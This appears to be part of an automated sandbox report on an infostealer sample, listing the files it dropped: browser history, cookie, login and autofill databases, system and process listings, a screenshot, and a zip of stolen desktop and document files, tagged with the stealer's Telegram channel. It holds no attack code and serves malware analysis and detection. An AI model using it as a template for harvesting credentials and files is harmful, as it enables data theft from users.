                                                                                                                                                                                                                                                          SSDEEP:24:L5xsMvXvxsajXJl1QXbsBQXY6CQExXBYGQFEDK4:LzlVVgmHgWdIoV
                                                                                                                                                                                                                                                          MD5:FC2BE027B954580D7C389EE60BF7A809
                                                                                                                                                                                                                                                          SHA1:9D2BEB95F433468ED667AA1ED8DD80C21D44FD4B
                                                                                                                                                                                                                                                          SHA-256:E291A44D3CEDA01F2D8FB5CA4828E33BF0ABA921E544168FDEFE7D77D0B99ADB
                                                                                                                                                                                                                                                          SHA-512:8C804E8F6C69C5F45CBF3FA8A01DBB17BA1DC5C5C4E14569621076D842756233DD2C2C6161F0997C77735A6C6C21C5DD9B1658549791008187D3BC22B8744F89
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..=========================================================================

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Historys.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2728
                                                                                                                                                                                                                                                          Entropy (8bit):4.660039615120458
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LFzmxDwemx5VcDKJMmx2VuDKJMmxhzxANLpzxAjVVpbjxA0ScpbjxAb:LFzmlwem/aDKMmAEDKMmfz0cdj7njU
                                                                                                                                                                                                                                                          MD5:20A3A44BDA7E4F584DE08D454799AE3B
                                                                                                                                                                                                                                                          SHA1:A9303AC5FA3167501761237DA4BF1872813A2D5F
                                                                                                                                                                                                                                                          SHA-256:B8D46AE104194B6FD27A55B0831CD2D14A2C656147A8A9AD3AC53656174439C0
                                                                                                                                                                                                                                                          SHA-512:2DE9ECF25CFE88E6CD07508E2936EFDAC1E0CC9E585B5B4194733CC1C61A30F9655C9519C44607C2CD7B4513BD8D1AE9644E066593254606862984E12EC7CD36
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID : 1..URL : https://go.microsoft.com/fwlink/?linkid=851546..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 2..URL : https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 3..URL : https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..=======================================

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Display (1).png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):705400
                                                                                                                                                                                                                                                          Entropy (8bit):7.926399061168775
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:uwaVun7OYV91jw2MtmRL6yzhEYEfOt0lZ6NNvgJaN87VlhYTqlxY8CLK:uwdn7Pf1sfsL6yz5OOt0T6N785R5l
                                                                                                                                                                                                                                                          MD5:2417AAD59CF8A5060AF2F0477AD2D7C5
                                                                                                                                                                                                                                                          SHA1:A99369C33B0844BBBF0A5BFB7F27D398D30B91AB
                                                                                                                                                                                                                                                          SHA-256:75C13C99E3EB621E857E5971B011A62D00CCA7DE44F92F291520F46D378CF55D
                                                                                                                                                                                                                                                          SHA-512:EFB630E5976E5E8667FE9A0619A1A725A745291193936288E4CB944EA04A9A762A368CD7EF9573A62BD9B7EB469A74E8AD0B26CB2C8AD1E2DAB4DB44BC9C6F9B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y...../&.Z./..y..L.....nZ....p%@.y...@x...... ..9...{o........o..?...u]....."~..^{.}.Y.*...9.....R.^..f.h.m..^.K...u....S....i.l?w8.N..E...v_.d&..8A...S...e.+6.........c_.i.....O.TZ....c.3=i.m..`..>...Q.>...c..u...1v..i...i.>.i1..Gg....)./=<.c../>4mZ_x.a......?8.....dl.a......9..?w...g...}...}V..j .>35..eO...>...O.zc<`...7....E...z3..v_.}..=..;f.#.d.............g....+........q...wN.;..w.s.~..^v{j.v[...;.ewLb|..3c..[b.......+.oy.1{.w.5.v5v.%-.............v..1.W.......3...tK.[...i...N7...../..=...;.c.v.9.....h.......Mil..S{..Rk..s.....YLcA>...oI.,g...Y........<.x..io}]n}l.G[B..msC....[.x|k...L{.k...nI...}..si.lc.}..6.7.&..[..luMfl.S{.....m.Z.6.2......._KK....Y....5..X.y[....._.a..u...7.yC..M..oz...=.0...2...&...v..W..............^...9.0.....A{..v.&.fc.[j..x.F....i|C....)O.g..[..}.....[.\..._..Z.].c.....s....oc....b...5

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):266
                                                                                                                                                                                                                                                          Entropy (8bit):4.281502386532761
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:111T8/s5hO7y9MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:Lv5hOP0X3RwwN3UuJA01K5CLpqI
                                                                                                                                                                                                                                                          MD5:23FB26C06CE6C057071E5346E4BF5BE2
                                                                                                                                                                                                                                                          SHA1:37E496FFFE731FC7AD155EE169642AF0DF7BA0C7
                                                                                                                                                                                                                                                          SHA-256:C7CDD16409A9F45463E6954219417EC5C7BC4EE66A0BCACC754D8D5C221F1E55
                                                                                                                                                                                                                                                          SHA-512:40E58FD7AEC9FBA2399F98374CB238B294FFF15417DBEA05DA1659158E4025795FFFE23E41BACD2A97C8F9E9FC212BF073A3C6C2BC4DB69B8BE168DDB996018B
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..8.46.123.189..United States..New York..America/New_York..Level 3 CenturyLink Communications, LLC AS3356 Level 3 Parent, LLC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25132
                                                                                                                                                                                                                                                          Entropy (8bit):4.741289899263353
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:DUpzYO0HoYvsfSZ/jKlgqABH6FEo/QjNW3mBBU0NjbpMtBpxtiWz5qTUJehouX3K:vGuaxCH1Y
                                                                                                                                                                                                                                                          MD5:75E2CDFAF8449F81C9ADB2E052A92795
                                                                                                                                                                                                                                                          SHA1:2E0F4C7F515FE84B2F65FDF7A7959EDCA75A6B55
                                                                                                                                                                                                                                                          SHA-256:1EF4DC407B28C1682245797984446E522A5A5C6503ED67165F863B08952682CB
                                                                                                                                                                                                                                                          SHA-512:19F6BA37F17625A61110884FFB14A076F0D82EE7A0FCAB75A189C1020013F484F0373714679AF3CD5E3673781463BBD5566A631E07D3B1A1FB5FEF17B6BA1936
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 176 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 79'452 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'236 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'300 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'256 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 5'996 K......Image Name: winlogon.exe...PID: 552

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):142864
                                                                                                                                                                                                                                                          Entropy (8bit):4.373018293360665
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:4oc5+DlX7z8oiEmea91gbTvU2LaWJVQgDFIaLVk2vcE66drKwIRBFKdQT8RSayLM:4oJwx0
                                                                                                                                                                                                                                                          MD5:E6703F689A8802CB0607BF7A12E7E595
                                                                                                                                                                                                                                                          SHA1:9FB5AB2E92F7BDF5A2833178D06C5C2229D0E070
                                                                                                                                                                                                                                                          SHA-256:47A10599F80E3F23708B9457A577262307889C86EEBB2386290060B9A860A40A
                                                                                                                                                                                                                                                          SHA-512:6699322DE4CFE3EB5B58762BF490E5D6F817E896C9F38A34AEA91C9EB7FB48F14401F5A858653FA175099A57E58322B7938B3952802AEA875312F3201AB9C641
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71388-77104-AAOEM...Original Install Date: 03/10/2023, 09:57:18...System Boot Time: 24/09/2023, 13:00:03...System Manufacturer: Utu2VL2XAMrn6tk...System Model: G8bcud5P...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]: Inte

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\AutofillData.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Cookies.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\DownloadData.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\HistoryData.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Logins.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES71B8.tmp

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Wed Jan 1 03:37:43 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1380
                                                                                                                                                                                                                                                          Entropy (8bit):4.092570766206948
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:HCDW9cZfqOfDfHffwK0fINwI+ycuZhNyGakSjXPNnqSGd:MBH/oKwIm1ulla35qS2
                                                                                                                                                                                                                                                          MD5:8121F843C240AD969B454085B830C135
                                                                                                                                                                                                                                                          SHA1:B84BFF0D0EAB6E1D8B47695A89AE524D1A907CDB
                                                                                                                                                                                                                                                          SHA-256:F4E9F034E16098915746FDA842BEB4DBBB94504CDFF0EE2F0B1BD72ACEBC93B7
                                                                                                                                                                                                                                                          SHA-512:55C775D94BF341BC71ECCE68720BF4D75E332A5DF90E9C02DDEC4D19A0CADDD84B014D2A352D2BE75540B8D707163C4643CB1D6EEEFEA47E8CB077F9963A3147
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:L.....tg.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........S....c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP...................oC..O...c..}...........4.......C:\Users\user\AppData\Local\Temp\RES71B8.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.q.d.d.o.o.n.a...d.l.l.....(.....

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela.zip

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):79088
                                                                                                                                                                                                                                                          Entropy (8bit):7.82611639742698
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:tG5/p/kbmg0DxtBGxBcD8e+Bs8Ntp6GU8l/z175k/QtlbYlvr9MGFcEtjtQliQ+a:A5/Jkbmg0DxqxOD8e+Bs8NhUA/z175k4
                                                                                                                                                                                                                                                          MD5:8B06591158608C0DADE3C3D932750EB8
                                                                                                                                                                                                                                                          SHA1:146B8658371A13902ABD2E5BD1681A832A8E4601
                                                                                                                                                                                                                                                          SHA-256:2336771B9E2A38030278672D0B9ED98AF96B2B3F29A991E98F688B8025FBE0A2
                                                                                                                                                                                                                                                          SHA-512:4EF05F98AFC6E608278D4A0321DC4F67807076CA9DA208CDE1168E33C56F3F57CAA9EE1F1794312D7DD83B3052B99B3290D1593F8E802A6D38374D20AC2A6495
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:PK...........Y................DTBZGIOOSO/PK...........Y................Desktop/PK...........Y................Documents/PK...........Y................Downloads/PK...........Y................ONBQCLYSPU/PK...........Y................UMMBDNEQBN/PK...........Y................VLZDGUKUTZ/PK...........Y................XZXHAVGRAG/PK........Q@DW................Desktop/BPMLNOBVSB.jpg..I.E!.......8...N.?H.-.".Jt-.X....#......a....u...8z.)..R...'....?tD..d.5.%}..O;......yl..4...g..[.=V..Y.gJM....c..cb.EF......C;&.^R...p..<.rQ..R......Vz....|....C.x.b.O..$\&..23Xj%...\]....BJ....).fh..|.rD.<.8.d.....S4.eIg`.-.....~.Y.a&.........=..=6....S.hw...B.E.$v........iK..=../L..8...`....LK.X...'..X..7.....vy.q.6N[.|f..v.O<.=:b...9e.o+..:y....3tL..{u.g.y..t..p"..a.Y.X...L...4=..FI.."..2....,.-.2Vm....^..1$..:.*..v......i...qk..#...<uWtD._....@.....p...6....\w?dw.10..l.>.Z........).c.h.D..8.r......F....u...;=...Lcj...q....u...+.}'...-..._....Y..m.......~_/...v&.5.;cB.r.u"

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DTBZGIOOSO\DTBZGIOOSO.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DTBZGIOOSO\KATAXZVCPS.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
